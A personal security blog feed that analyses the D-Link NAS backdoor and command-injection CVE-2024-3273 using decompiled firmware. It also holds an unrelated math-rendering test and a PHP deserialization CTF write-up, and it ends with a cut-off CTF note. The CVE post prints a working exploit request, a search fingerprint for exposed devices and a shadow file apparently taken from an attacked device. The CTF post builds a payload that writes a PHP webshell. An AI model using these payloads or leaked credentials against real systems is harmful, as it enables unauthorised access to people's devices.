💠 Pine

CVE-2024-3273

pine的个人博客 — Fri, 31 Oct 2025 16:00:00 GMT

摘要

在D-LinkNAS中多个产品的/cgi-bin/nas_sharing.cgi脚本中存在硬编码后门漏洞（用户名messagebus，密码为空），system参数通过Base64编码可以执行系统命令威胁者可组合利用这两个漏洞通过HTTP GET请求将Base64编码的命令添加到system参数从而在系统上执行任意命令，成功利用可能导致未授权访问敏感信息、修改系统配置或拒绝服务等。

影响范围

DNS-320L 版本1.11、版本1.03.0904.2013、版本1.01.0702.2013

DNS-325 版本1.01

DNS-327L 版本1.09，版本1.00.0409.2013

DNS-340L 版本1.08

环境

使用的固件 -> dns-340l dns-320l

虚拟机 -> IOT-Research

反汇编分析工具 -> IDA_Pro 9.0

https://media.dlink.eu/support/products/dns/dns-340l/driver_software/dns-340l_fw_reva1_1-08_eu_multi_20180731.zip
https://support.dlink.com/resource/products/dns-320l/REVA/DNS-320L_FIRMWARE_1.03B08.ZIP

指纹 -> _fid="hWN+yVVhLzKJaLkd/ITHpA==" && Country !="CN"

复现过程

简单测试

poc -> https://github.com/Chocapikk/CVE-2024-3273

GET /cgi-bin/nas_sharing.cgi?cmd=15&passwd=&system=aWQ=&user=messagebus HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://xxx.xxx.xxx.xxx/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Origin: http://xxx.xxx.xxx.xxx
Accept-Language: zh-CN,zh;q=0.9

返回id的执行内容就算成功了，也就是system={{base64_enc(cmd)}}

分析固件

我们对将DLINK_DNS-340L_1.08b01(1.01.0502.2018)进行binwalk解包

binwalk -Me DLINK_DNS-340L_1.08b01(1.01.0502.2018)

使用exp攻击后，根据远程目标靶机上返回的pwd值，确定目标运行路径是/var/www/cgi-bin也就是说我们攻击入口是/var/www/cgi-bin/nassharing.cgi ，对应固件中的squashfs-root/cgi/nassharing.cgi ，squashfs是它应用系统的挂载点

int cgiMain()
{
    int v0; // r5
    int v1; // r3
    int v3; // [sp+0h] [bp-20h] BYREF
    int v4; // [sp+4h] [bp-1Ch]
    char nptr[4]; // [sp+8h] [bp-18h] BYREF
    int v6; // [sp+Ch] [bp-14h]

    v3 = 0;
    v4 = 0;
    *(_DWORD *)nptr = 0;
    v6 = 0;
    ((void (__fastcall *)(const char *, int *, int))cgiFormString)("cmd", &v3, 8);
    v0 = strtol((const char *)&v3, 0, 10);
    cgiFormString("dbg", nptr, 8, v1, v3, v4);
    if ( nptr[0] )
        dword_3E4FC = strtol(nptr, 0, 10);
    switch ( v0 )
    {
        case 0:
            sub_196AC();
            break;
        case 1:
            sub_12C50();
            break;
       .....
        case 13:
            sub_14DB4();
            break;
        case 14:
            sub_151B0();
            break;
        case 15:
            sub_19108();
            break;
        case 16:
            sub_19230();
            break;
        ......
        case 75:
            sub_1AC74();
            break;
        case 76:
            sub_1B4DC();
            break;
        case 77:
            sub_1AEC8();
            break;
        case 78:
            sub_1AD9C();
            break;
        case 80:
            sub_1B2D0();
            break;
        case 81:
        case 82:
        case 83:
        case 84:
        case 85:
        case 86:
        case 87:
        case 88:
        case 89:
            sub_1B604(v0);
            break;
        ......
            break;
        case 98:
            sub_1C790();
            break;
        case 99:
      sub_1C9CC();
      break;
    case 100:
      sub_1CD24();
      break;
    ......   
    default:
      sub_128D0();
      break;
  }
  return 0;
}

代码从表单中获取了传入cmd和dbg的值，并对cmd的值进行了判断，也就是我们POC中传入的"cmd=15"

我们跟进case 15对应的sub_19108()函数

int sub_19108()
{
    int v0; // r3
    int v1; // r3
    int v2; // r3
    int v3; // r0
    int v5; // r3
    _DWORD v6[1024]; // [sp+0h] [bp-4008h] BYREF
    _BYTE s[4096]; // [sp+1000h] [bp-3008h] BYREF
    char v8[4096]; // [sp+2000h] [bp-2008h] BYREF
    char command[4104]; // [sp+3000h] [bp-1008h] BYREF

    memset(v6, 0, sizeof(v6));
    memset(s, 0, sizeof(s));
    memset(v8, 0, sizeof(v8));
    memset(command, 0, 0x1000u);
    ((void (__fastcall *)(const char *, _DWORD *, int, int))cgiFormString)("user", v6, 4096, v0);
    cgiFormString("passwd", s, 4096, v1, v6[0], v6[1]);
    v2 = LOBYTE(v6[0]);
    if ( !LOBYTE(v6[0]) )
    {
        v2 = s[0];
        if ( !s[0] )
        {
            ((void (__fastcall *)(const char *, _DWORD *, int, _DWORD))cgiFormString)("id1", v6, 4096, s[0]);
            cgiFormString("id2", s, 4096, v5, v6[0], v6[1]);
        }
    }
    cgiFormString("system", v8, 4096, v2, v6[0], v6[1]);  // 获取system参数
    if ( !sub_1E1CC(v6, s) )  // 身份验证检查
        return sub_128D0();    // 验证失败的处理
    strlen(v8);
    sub_1DD88((u_char *)command, v8);  // base64解码v8传入command 这里应该是有错误的，strlen应该作为一个参数传入到这个函数中
    fix_path_special_char(command);    // 修复路径特殊字符
    v3 = system(command);              // 执行系统命令
    return sub_12998(v3);              // 返回执行结果
}

可以看到，代码从CGI表单获取"user"和"passwd"字段传入到v6和s。如果都为空就从id1和id2中获取。之后传入sub_1E1CC认证

int sub_128D0()
{
  int v0; // r4 - XML文档指针
  int v1; // r7 - 根节点指针  
  int v2; // r6 - 子节点指针
  char *format; // [sp+0h] [bp-20h] BYREF - 输出的XML字符串
  int v5; // [sp+4h] [bp-1Ch] BYREF - XML字符串长度
  v0 = xmlNewDoc("1.0");           // 创建XML文档，版本1.0
  v1 = xmlNewNode(0, "config");    // 创建根节点"config"
  xmlDocSetRootElement(v0, v1);    // 设置根节点
  v2 = xmlNewNode(0, "nas_sharing");      // 创建"nas_sharing"节点
  xmlAddChild(v1, v2);                    // 添加到根节点
  xmlNewChild(v2, 0, "auth_state", "0");  // 添加子节点"auth_state"值为"0"
  xmlDocDumpMemoryEnc(v0, &format, &v5, "UTF-8");  // 将XML转为UTF-8字符串
  fprintf((FILE *)cgiOut, format);                  // 输出到CGI响应
  free(format);              // 释放XML字符串内存
  return free_xml_memory(v0); // 释放XML文档内存
}

可见如果passwd和user认证失败会返回一个xml，其中auth_state为0，回显包如下

HTTP/1.1 200 OK
Content-Language: en
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Date: Mon, 27 Oct 2025 08:26:00 GMT
Server: lighttpd/1.4.28
Content-Type: text/xml; charset=utf-8
Content-Length: 111

<?xml version="1.0" encoding="UTF-8" ?>
<config><nas_sharing><auth_state>0</auth_state></nas_sharing></config>

而如果认证成功则会进入sub_12998并回显一个auth_state为1的xml。我们跟进sub_1E1CC认证函数

int __fastcall sub_1E1CC(const char *a1, const char *a2)
{
  const char *v4; // r7 - 遍历特殊用户名的指针
  const char *v5; // t1 - 临时存储当前特殊用户名
  int result; // r0 - 函数返回值
  FILE *v7; // r5 - shadow文件指针
  struct passwd *v8; // r0 - 从shadow文件读取的用户信息
  struct passwd *v9; // r6 - 存储匹配的用户信息
  const char *v10; // r0 - 密码验证结果
  char v11[4096]; // [sp+0h] [bp-1118h] BYREF - Base64解码后的密码缓冲区
  char s[128]; // [sp+1000h] [bp-118h] BYREF - 存储shadow文件中的密码哈希
  char dest[152]; // [sp+1080h] [bp-98h] BYREF - 处理密码的临时缓冲区

  // 初始化所有缓冲区为0
  memset(s, 0, sizeof(s));        // 清空密码哈希缓冲区
  memset(dest, 0, 0x80u);         // 清空密码处理缓冲区
  memset(v11, 0, sizeof(v11));    // 清空Base64解码缓冲区
  
  v4 = "dbg";  // 指向特殊用户名列表的起始位置（假设"dbg"是第一个特殊用户）
  
  while ( 1 )// 循环检查特殊用户名
  {
    v5 = (const char *)*((_DWORD *)v4 + 1);  // 获取当前特殊用户名
    v4 += 4;                                 // 移动到下一个特殊用户条目
    result = strcmp(a1, v5);                 // 比较输入用户名与特殊用户名
    if ( !result )                           // 如果匹配成功
      break;                                 // 跳出循环，返回成功
    if ( v4 == (const char *)off_2BCF0 )    // off_2BCF0可能是特殊用户列表的结束标记
    {
      if ( *a2 )      // 如果密码不为空
      {
        _b64_pton(a2, (u_char *)v11, 0x1000u);// 对Base64编码的密码进行解码
        if ( dword_3E4FC )// 如果调试模式开启，输出密码信息
        {
          sub_12878("pwd [%s]\n", a2);           // 输出原始密码（Base64）
          sub_12878("pwd decode[%s]\n", v11);    // 输出解码后的密码
        }
      }
      v7 = (FILE *)fopen64("/etc/shadow", "r");// 打开系统shadow文件读取用户密码信息      
      do// 循环读取shadow文件中的用户条目
      {
        v8 = fgetpwent(v7);  // 获取下一个用户密码条目
        v9 = v8;             // 保存当前用户条目
        if ( !v8 )           // 如果到达文件末尾（用户不存在）
          return 0;          // 返回验证失败
      }
      while ( strcmp(v8->pw_name, a1) );  // 继续查找直到找到匹配的用户名
      strncpy(s, v9->pw_passwd, 0x80u);// 复制找到用户的密码哈希到缓冲区s
      fclose(v7);  // 关闭shadow文件
      strncpy(dest, v11, 0x80u);// 复制解码后的密码到dest缓冲区
      v10 = (const char *)sub_1E160((int)dest, s);// 调用密码验证函数sub_1E160进行密码验证
      return strncmp(v10, s, 0x80u) == 0;// 比较验证结果与原始密码哈希，返回比较结果
    }
  }
  return result;// 如果是特殊用户，直接返回验证成功
}

首先检查用户名是否在预定义的特殊用户列表中，如果是则直接返回验证，如果不是就Base64解码传入的密码，读取系统/etc/shadow文件，查找对应用户名的密码哈希，使用sub_1E160函数验证密码，比较验证结果与存储的哈希值。

.rodata:0002BCDC aDbg            DCB "dbg",0             ; DATA XREF: cgiMain+48↑o
.rodata:0002BCDC                                         ; .text:off_1DD80↑o ...
.rodata:0002BCE0 off_2BCE0       DCD aRoot               ; DATA XREF: sub_1E1CC+4C↑r
.rodata:0002BCE0                                         ; "root"
.rodata:0002BCE4                 DCD aNobody             ; "nobody"
.rodata:0002BCE8                 DCD aFtp                ; "ftp"
.rodata:0002BCEC                 DCD aSqueezecenter      ; "squeezecenter"
.rodata:0002BCF0 off_2BCF0       DCD aSshd               ; DATA XREF: sub_1E324+4↑o
.rodata:0002BCF0                                         ; .text:off_1E3DC↑o
.rodata:0002BCF0                                         ; "sshd"
.rodata:0002BCF4 off_2BCF4       DCD aRoot               ; DATA XREF: sub_1E324+1C↑r
.rodata:0002BCF4                                         ; "root"
.rodata:0002BCF8                 DCD aNobody             ; "nobody"
.rodata:0002BCFC                 DCD aFtp                ; "ftp"
.rodata:0002BD00                 DCD aSqueezecenter      ; "squeezecenter"
.rodata:0002BD04                 DCD aSshd               ; "sshd"
.rodata:0002BD08 ; const char a08x[]

我们这里可以看到即使是特殊用户列表，指针也会调用sub_1E324

int __fastcall sub_1E324(char *s1, const char *a2)
{
  char **v2; // r4                           // 定义字符串指针数组
  const char *v5; // t1                      // 临时字符串指针
  int result; // r0                          // 函数返回值
  FILE *v7; // r6                            // 文件指针
  struct passwd *v8; // r0                   // 密码结构体指针
  struct passwd *v9; // r4                   // 密码结构体指针副本
  const char *v10; // r0                     // 字符串指针
  char v11[80]; // [sp+0h] [bp-B8h] BYREF   // 缓冲区，存储密码哈希
  char dest[104]; // [sp+50h] [bp-68h] BYREF // 缓冲区，存储输入密码

  v2 = off_2BCF0;                           // 初始化指针数组
  while ( 1 )                               // 开始循环
  {
    v5 = v2[1];                             // 获取数组中的下一个字符串
    ++v2;                                   // 指针移动到下一个位置
    result = strcmp(s1, v5);                // 比较输入字符串和数组中的字符串
    if ( !result )                          // 如果字符串匹配
      break;                                // 跳出循环
    if ( v2 == &off_2BD04 )                 // 如果已遍历完数组
    {
      v7 = (FILE *)fopen64("/etc/shadow", "r"); // 打开shadow文件
      while ( 1 )                           // 开始循环读取shadow文件
      {
        v8 = fgetpwent(v7);                 // 读取下一个密码条目
        v9 = v8;                            // 保存密码条目
        if ( !v8 )                          // 如果读取失败或文件结束
          break;                            // 跳出循环
        if ( !strcmp(v8->pw_name, s1) )     // 如果找到匹配的用户名
        {
          strcpy(v11, v9->pw_passwd);       // 复制密码哈希到缓冲区
          fclose(v7);                       // 关闭shadow文件
          strcpy(dest, a2);                 // 复制输入密码到缓冲区
          v10 = (const char *)sub_1E160((int)dest, v11); // 调用密码加密函数
          return strcmp(v10, v11) == 0;     // 比较加密后的密码与存储的哈希
        }
      }
      return 0;                             // 未找到用户返回0
    }
  }
  return result;                            // 返回字符串比较结果
}

sub_1E1CC和sub_1E324均调用了sub_1E160获取密码的哈希

Linux /etc/shadow 文件只有 root 用户拥有读权限格式如下

用户名：加密密码：最后一次修改时间：最小修改时间间隔：密码有效期：密码需要变更前的警告天数：密码过期后的宽限时间：账号失效时间：保留字段

admin:$1$$gve3Uka.V1oDuclEp0W.g1:0:0:99999:7:::
nobody:pACwI1fCXYNw6:0:0:99999:7:::
squeezecenter:$1$$o7vIitnZu4MHlaR5S90M/1:15460:0:99999:7:::
root:$1$$qRPK7m23GJusamGpoGLby/:14746:0:99999:7:::
messagebus:$1$$qRPK7m23GJusamGpoGLby/:19060:0:99999:7:::
HramAdmin:$1$$gve3Uka.V1oDuclEp0W.g1:19268:0:99999:7:::
IrinaZabolotnaya:$1$$A1IGgeA6wZYlyzfzp9sV60:19801:0:99999:7:::
Navrotskaya:$1$$PepcYs8FT7wT54SJjROql0:20070:0:99999:7:::
Sharkov:$1$$8w9mpx4vnRY08fRK/ZN0b/:20070:0:99999:7:::
Krikota:$1$$RRfa3MMgwtTOsb0TrxxHu/:20070:0:99999:7:::
Foto:$1$$.YDIniGthJtsdQXpVvVtA/:20179:0:99999:7:::

这里我们messagebus的密码和root一样都是空密码，也就是说，只要我们用户名是messagebus或root并将密码置空就可以执行将system表单接受的v8传入command，再经过fix_path_special_char处理后执行并返回结果。

    cgiFormString("system", v8, 4096, v2, v6[0], v6[1]);  // 获取system参数
    if ( !sub_1E1CC(v6, s) )  // 身份验证检查
        return sub_128D0();    // 验证失败的处理
    strlen(v8);
    sub_1DD88((u_char *)command, v8);  // base64解码v8传入command
    fix_path_special_char(command);    // 修复路径特殊字符
    v3 = system(command);              // 执行系统命令
    return sub_12998(v3);              // 返回执行结果

在实际测试中我们发现如果用户名是root或执行的命令中包含空格会执行失败，而exp中不会，检查exp相关代码

command_final = f"echo -e {command_hex}|sh".replace(' ', '\t')

我们可以看到exp将空格以制表符代替，绕过了空格过滤，我们猜测fix_path_special_char就是相关的过滤函数

我们通过ldd命令查找到usrlib/libmmf.so

objdump -T libmmf.so | grep fix_path_special_char
>00003a88 g    DF .text  00000288  Base        fix_path_special_char

char *__fastcall fix_path_special_char(char *a1)
{
  char *v2; // r5
  char *v3; // r6
  int v4; // r3
  bool v5; // zf
  char *v6; // r2
  char *result; // r0
  char v8[1048]; // [sp+0h] [bp-418h] BYREF

  memset(v8, 0, 0x400u);
  v2 = strchr(a1, 36);
  if ( v2 )
    goto LABEL_2;
  v3 = strchr(a1, 96);
  if ( v3 )
    goto LABEL_26;
  v2 = strchr(a1, 35);
  if ( v2 )
    goto LABEL_28;
  if ( strchr(a1, 37) )
    goto LABEL_26;
  v3 = strchr(a1, 94);
  if ( v3 )
  {
    v2 = 0;
    v3 = 0;
    goto LABEL_3;
  }
  v2 = strchr(a1, 38);
  if ( v2 )
    goto LABEL_28;
  v3 = strchr(a1, 40);
  if ( v3 )
    goto LABEL_26;
  v2 = strchr(a1, 41);
  if ( v2 )
    goto LABEL_28;
  if ( strchr(a1, 43) )
    goto LABEL_26;
  if ( strchr(a1, 123) || (v2 = strchr(a1, 125)) != 0 )
  {
LABEL_2:
    v2 = 0;
    v3 = 0;
    goto LABEL_3;
  }
  v3 = strchr(a1, 59);
  if ( v3 )
  {
LABEL_26:
    v3 = 0;
    goto LABEL_3;
  }
  v2 = strchr(a1, 91);
  if ( v2 )
    goto LABEL_28;
  v3 = strchr(a1, 93);
  if ( v3 )
    goto LABEL_26;
  v2 = strchr(a1, 39);
  if ( v2 )
  {
LABEL_28:
    v2 = 0;
    goto LABEL_3;
  }
  v3 = strchr(a1, 61);
  if ( v3 )
    goto LABEL_26;
  result = strchr(a1, 32);
  if ( !result )
    return result;
  v2 = 0;
LABEL_3:
  while ( (unsigned int)v2 < strlen(a1) )
  {
    v4 = (unsigned __int8)v2[(_DWORD)a1];
    v5 = v4 == 36;
    if ( v4 != 36 )
      v5 = v4 == 96;
    if ( v5
      || v4 == 35
      || v4 == 37
      || v4 == 94
      || v4 == 38
      || v4 == 40
      || v4 == 41
      || v4 == 43
      || v4 == 123
      || v4 == 125
      || v4 == 59
      || v4 == 91
      || v4 == 93
      || v4 == 39
      || v4 == 61
      || v4 == 32 )
    {
      v6 = &v8[(_DWORD)v3++ + 1024];
      *(v6 - 1024) = 92;
    }
    ++v2;
    v8[(_DWORD)v3++] = v4;
  }
  return strcpy(a1, v8);
}

检测特殊字符：检查输入字符串中是否包含以下特殊字符并添加\转义处理

$ (36), ` (96), # (35), % (37), ^ (94), & (38), ( (40), ) (41), + (43), { (123), } (125), ; (59), [ (91), ] (93), ' (39), = (61), 空格 (32)

对于root执行失败的情况，是因为它在dbg对应的特殊用户列表中，直接跳过检查返回0了

修复方案

替换固件

使用漏洞或者UART Console修改messagebus的密码

在固件中将messagebus的指针去掉

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: http://pinesawfly.top/blog/cve-2024-3273/

Testing Mathematical Formulas in Markdown

pine的个人博客 — Fri, 30 May 2025 16:00:00 GMT

This document serves as a test for rendering mathematical formulas in Markdown using $$ delimiters.

Basic Algebra

Let's start with some fundamental algebraic expressions.

The quadratic formula is given by: $$x = \frac{-b \pm \sqrt{b^2-4ac}}{2a}$$

A simple linear equation: $$y = mx + c$$

Expansion of a binomial square: $$(a+b)^2 = a^2 + 2ab + b^2$$

Calculus

Here are some common expressions from calculus.

The limit definition of a derivative: $$f'(x) = \lim_{h \to 0} \frac{f(x+h) - f(x)}{h}$$

A definite integral: $$\int_{a}^{b} f(x) dx$$

The Taylor series expansion of $e^x$ around $x=0$: $$e^x = \sum_{n=0}^{\infty} \frac{x^n}{n!} = 1 + x + \frac{x^2}{2!} + \frac{x^3}{3!} + \cdots$$

Trigonometry

Some basic trigonometric identities.

Pythagorean identity: $$\sin^2\theta + \cos^2\theta = 1$$

Angle addition formula for sine: $$\sin(\alpha + \beta) = \sin\alpha\cos\beta + \cos\alpha\sin\beta$$

Euler's formula: $$e^{i\theta} = \cos\theta + i\sin\theta$$

Statistics and Probability

Formulas commonly used in statistics and probability.

The formula for the mean ($\mu$) of a set of $n$ numbers $x_1, x_2, \ldots, x_n$: $$\mu = \frac{1}{n} \sum_{i=1}^{n} x_i$$

The probability density function of a normal distribution: $$f(x | \mu, \sigma^2) = \frac{1}{\sqrt{2\pi\sigma^2}} e^{-\frac{(x-\mu)^2}{2\sigma^2}}$$

Bayes' theorem: $$P(A|B) = \frac{P(B|A)P(A)}{P(B)}$$

Linear Algebra

Examples from linear algebra.

A 2x2 matrix: $$A = \begin{pmatrix} a & b \ c & d \end{pmatrix}$$

The determinant of a 2x2 matrix: $$\det(A) = ad - bc$$

Matrix multiplication of two matrices A and B: $$C = AB$$

Physics

A couple of well-known physics equations.

Einstein's mass-energy equivalence: $$E = mc^2$$

Newton's second law of motion: $$F = ma$$

This should provide a good test of how various mathematical formulas are rendered.

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: http://pinesawfly.top/blog/mathematics-examples/

强网杯 2019 upload

pine的个人博客 — Tue, 20 May 2025 16:00:00 GMT

[强网杯 2019]upload

写在最前

本题虽然是 upload 的题目，但是主要考察的是 php 审计和 php 反序列化，重要的是审计思路，题目给出的 hint 是 php 程序中的断点，我们通过分析断点本身包含的信息和该信息来源去向理清程序运行过程。如何查找到我们需要的内容信息和为什么要查找这个内容信息是值得我们思考的。网上绝大多数 WP 只给出怎么做却不知为什么要这么做，更不知如何知道为什么要这么做。

分析过程

注册登录发现是一个文件上传，正常思路打一遍无果。只能传入图片马，如果传入的是 jpg 会重命名为.png。由于不能上传.hatcess 文件我们无法以 php 方式解析，图片解析POST会 405。其他常规黑盒测试不做细说。

继续信息搜集 dirsearch 扫描发现www.tar.gz文件，dump 到本地来审计。发现有 .idea 目录(.idea 是 IntelliJ IDEA 等 JetBrains 系列编辑器存放项目配置信息的目录，包含历史记录、版本控制信息等内容)，放在这里显然是个 hint，phpstrom 打开。是 ThinkPHP5 的框架，2019 年是爆过相关漏洞的，但尝试后发现漏洞条件不存在。对整个项目粗扫一遍，发现在 application/web/controller/Register.php 的 __destruct 函数和 application/web/controller/Index.php 的 login_check 函数下有两个断点。

这两个代码位置显然是程序运行过程中对用户信息进行处理的关键节点，所以我们的审计思路是查找这个节点的信息以及信息的来源和去向。

节点信息

本地启动监听截取一下 __destruct 这个函数断点中内容，猜测是检查数据库中是否存在该用户数据。如果registed == false，则调用 $checker->index()。

本地启动监听截取一下 login_check 这个函数断点中内容。

profile=unserialize(base64_decode($profile));
YTo1OntzOjI6IklEIjtpOjM7czo1OiJlbWFpbCI7czoxMToicGluZUBxcS5jb20iO3M6ODoidXNlcm5hbWUiO3M6MTE6InBpbmVAcXEuY29tIjtzOjg6InBhc3N3b3JkIjtzOjMyOiIxNWRjOGJlZDRlMzgwYTI2MWI3Nzk0NzY5Yjk3YTc0ZCI7czozOiJpbWciO3M6MDoiIjt9
base64解码 --> a:5:{s:2:"ID";i:1;s:5:"email";s:10:"www@11.com";s:8:"username";s:3:"www";s:8:"password";s:32:"4eae35f1b35977a00ebd8086c259d4c9";s:3:"img";s:79:"../upload/f528764d624db129b32c21fbca0cb8d6/4efdd2f969559e8b1c92e99f32ded48e.png";}

发现调用了 unserialize 反序列化函数和 base64 解码函数对$profile 进行处理，$profile是定义在login_check 方法下的变量，该变量来源于我们 cookie 中的 user 字段。__destruct 和 unserialize 都是 php 反序列化相关的内容，此处先记下。

信息来源

因为有 unserialize 就肯定有 serialize，我们通过查找这个函数并逐一排查是否与 user 相关找到 user 这个 cookie 的来源。

一个是 application/web/controller/login.php，登录成功后将数据库查到的 user_info 序列化返回。

一个是 application/web/controller/profile.php，更新头像后对 user_info 更新头像路径字段后序列化返回。

此处如何知道 cookie 的来源作用呢？可以在此下断点的查看 user_info 的序列化内容，并结合代码猜测。

信息去向

现在我们知道 cookie 的来源了，下一步是查找它的去向，全局查找 login_check 函数的调用点，发现 application/web/controller/ 下均调用了，也就是我们需要审计的文件。

关键点审计

将这四个文件粗扫一遍，发现 application/web/controller/下 php 文件中还包含反序列化相关的函数，发现了__construct，__get 和__call 三个 php 常见反序列化的函数，特别是profile.php 同时有详细定义的三个反序列化常见函数。还记得我们之前记下的 php 反序列化的点么，我们也可以尝试看看有没有反序列化相关的漏洞。

以__destruct 为入口函数，正常应该是registed 为 False 进入函数，调用 checker（也就是 Index 类的实例）的 index () 方法。

    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }

同时我们在application/web/controller/ 下的四个文件中除了 index.php 外没有发现其他定义 index.php 的地方，但是我们在profile.php 文件下发现 __call( ) 方法的相关定义。__call( )方法允许我们在对象中调用一个不可访问的方法时调用该方法，也就是说如果我们将 checker 设置为 Profile 类的实例，即可通过调用 Profile 实例中不存在的 index 方法调用 __call 方法。

public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

__call 方法会检查当前对象是否存在属性 $name（即属性名与被调用的方法名相同）。例如，调用 test() 时，检查是否有 $this->test 属性。如果 $this->{$name} 存在且为非空时，则获取该属性的值（假设为 $method），并调用当前对象的 $method 方法，同时将 $arguments 作为参数传入。我们是通过调用不存在的 index 方法调用到的 __call 方法，所以此时我们的调用方法应该是 index()，因而 __call 会检查当前对象也就是我们设置的 Profile 类实例是否存在 $index 这个属性，这里显然是不存在的。

此时就达成了访问不可访问的属性这一行为，会调用 Profile 类实例中的 __get( ) 方法，因为没有$this->index，所以会触发 __get('index')。

 public function __get($name)//$name='index'
    {
        return $this->except[$name];
    }

如此我们可以令Profile 类实例中属性$except=array("index"=>"Profile 类中的函数 XXX"); 从而使得对象变为

return $this->except[$name];
return $this->except=['index' => 'xxxx']
// $this->{$this->except['index']}()
// ==>
// $this->XXXX()
//PHP 中，$arr=['a'] 等价于 $arr[0]='a'（默认数字索引），而非 $arr['index']='a'；
//只有显式指定 'index' => 'xxxx'，才会把index作为键、xxxx作为值。

进而实现Profile 类实例中函数任意调用。那么我们应该尝试调用哪个函数呢，直觉猜测应该是upload_img，因为这个函数调用了login_check 、update_img、ext_check 函数，而update_img 函数调用了update_cookie 函数。

整个 profile 类处理逻辑是，创建基于用户 IP 的 MD5 值命名的上传目录；验证用户登录状态，未登录则重定向至首页；处理文件上传，如果 empty($_FILES)为假也就是$_FILES 不为空，则获取临时文件路径赋值给filename_tmp；通过对上传文件的原始名称进行 MD5 加密，并拼接.png扩展名，生成要保存的文件名filename；随后调用ext_check()方法检查文件扩展名是否为 png ，将ext 设置为文件后缀名。之后通过 getimagesize 验证是否为图片，复制 filename_tmp 到 filename，删除filename_tmp；更新数据库中用户的图片路径信息，并同步更新存储用户信息的 cookie；

我们之前尝试的上传.htaccess 文件尝试绕过 png 后缀解析失败了，但是如果我们可以在这里控制最后的文件后缀名的话就可以将我们上传的 png 文件变成 php 文件了。这里也反向说明我们要调用upload_img。

总结我们的调用链如下

cookie -> base64decode -> unserialize
-> Register::__destruct() //checker -> Profile()
-> Profile::__call() //$name = index
-> Profile::__get() //except['index']='upload_img'
-> Profile::upload_img()

本地测试

审计差不多了，我们尝试打一下 poc，目的是调用 @cwdopy($this->filename_tmp, $this->filename);改我们的图片马的文件名。

<?php
namespace app\web\controller;//这里必须要有，因为反序列化要知道需要实例化的对象是哪个类。

class Register 
{   public $checker;//profile()实例
    public $registed;//false
    public function __destruct()//篇幅原因删了点空格，属性和方法都没改
    {
        if(!$this->registed){$this->checker->index();}
    }
}
class Profile
{
    public $checker;//这里我们没设置值，所以进入Profile实例调用if($this->checker)会因为null而直接跳过
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;
    public function __get($name)
    {return $this->except[$name];}
    public function __call($name, $arguments)
    {if($this->{$name}){$this->{$this->{$name}}($arguments);}}
}

$profile = new Profile();
$profile -> except = ['index' => 'upload_img'];
$profile->filename_tmp = "./upload/f528764d624db129b32c21fbca0cb8d6/16c3b33330a33f4162210be93afcfb5a.png";
$profile->filename = "./upload/f528764d624db129b32c21fbca0cb8d6/shell.php";

$register = new Register();
$register->registed = FALSE;
$register->checker = $profile;

echo urlencode(base64_encode(serialize($register)));

在 profile 类中所有 if 和与其属性相关的代码打上断点，更新 cookie 查看运行情况，发现顺利进入profile 类，但是在ext 处断掉，页面提示不能将Register 做为一个数组。

正常上传图片可以查看到 ext 属性正常的值。

将 ext 设置为 png 后重试，发现正常通过 ext 这个断点，其实此时就可以通 buu 的远程了，但是我们本地调试断在getimagesize($this->filename_tmp)。getimagesize()函数获取一个图片的尺寸和文件类型，它接受图片文件的路径作为参数，并返回一个包含图片宽度、高度、类型以及MIME类型的数组。这里是因为我们本地是 windows 系统，tp 路径配置有错误，filename_tmp 没接收到，简短粗暴直接把文件换成绝对路径就好了。

<?php
namespace app\web\controller;//这里必须要有，因为反序列化要知道需要实例化的对象是哪个类。

class Register 
{   public $checker;//profile()实例
    public $registed;//false
    public function __destruct()
    {
        if(!$this->registed){$this->checker->index();}
    }
}
class Profile
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;
    public function __get($name)
    {return $this->except[$name];}
    public function __call($name, $arguments)
    {if($this->{$name}){$this->{$this->{$name}}($arguments);}}
}

$profile = new Profile();
$profile -> except = ['index' => 'upload_img'];
$profile->ext = "png";
$profile->filename_tmp = "E:/phpstudy_pro/upload/tp5/f528764d624db129b32c21fbca0cb8d6/e04b7fb2d790bed075a90916ecd43ff1.png";
$profile->filename = "E:/phpstudy_pro/upload/tp5/f528764d624db129b32c21fbca0cb8d6/shell.php";

$register = new Register();
$register->registed = FALSE;
$register->checker = $profile;

echo urlencode(base64_encode(serialize($register)));

答疑

为什么有些 exp 的 ext 为 1

我们直接拿 poc 打，可见当上传文件时候 $_FILES 才会有值，这里的 $_FILES 是和 $_POST 差不多的用途。与是不是第一次上传无关。

我们反序列化的时候因为没有传文件上去所以$_FILES 是空的，不会执行下面的指令，就跳过了原函数对 filename 和 filename_tmp 的设置以及调用 ext_check()检查。也就是说无所谓 ext 是不是 png。但是下面$this ->ext 必须为真，不然不能执行 copy 等指令。

为什么有些 exp 会设置$checker 为 0

调用 upload_img 时候会检查 checker 是否存在，设置为 0 可以跳过 if 判断进入，这里本文是直接为 null。

为什么有些 exp 要将except=['index' => 'img']

不知，笔者感觉可能多此一举，直接将 index 设置为 upload_img 就已经可以达成调用函数的目的了。

 public function __get($name)//$name='index'
    {
        return $this->except[$name];
    }

except 在源码中本质上是一个数组，在实际调用中，$except=['a'] 等价于 $except[0]='a'（默认数字索引），而非 $except['index']='a'；只有显式指定 'index' => 'xxxx'，才会把index作为键、xxxx作为值。

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: http://pinesawfly.top/blog/%E5%BC%BA%E7%BD%91%E6%9D%AF2019upload/

CISCN2019 华东南赛区 Double Secret

pine的个人博客 — Sun, 27 Apr 2025 16:00:00 GMT

[CISCN2019 华东南赛区]Double Secret

看完直接信息搜集

出了一个secret，直接访问，提示传一个secret，对面会编码它


/secret?secret=1                        d
/secret?secret=14aw                     d[XB
/secret?secret=12345                    报错了，python的debug

这个debug就很有可玩的点了，计算pin码，源码泄露

可以看到的信息有

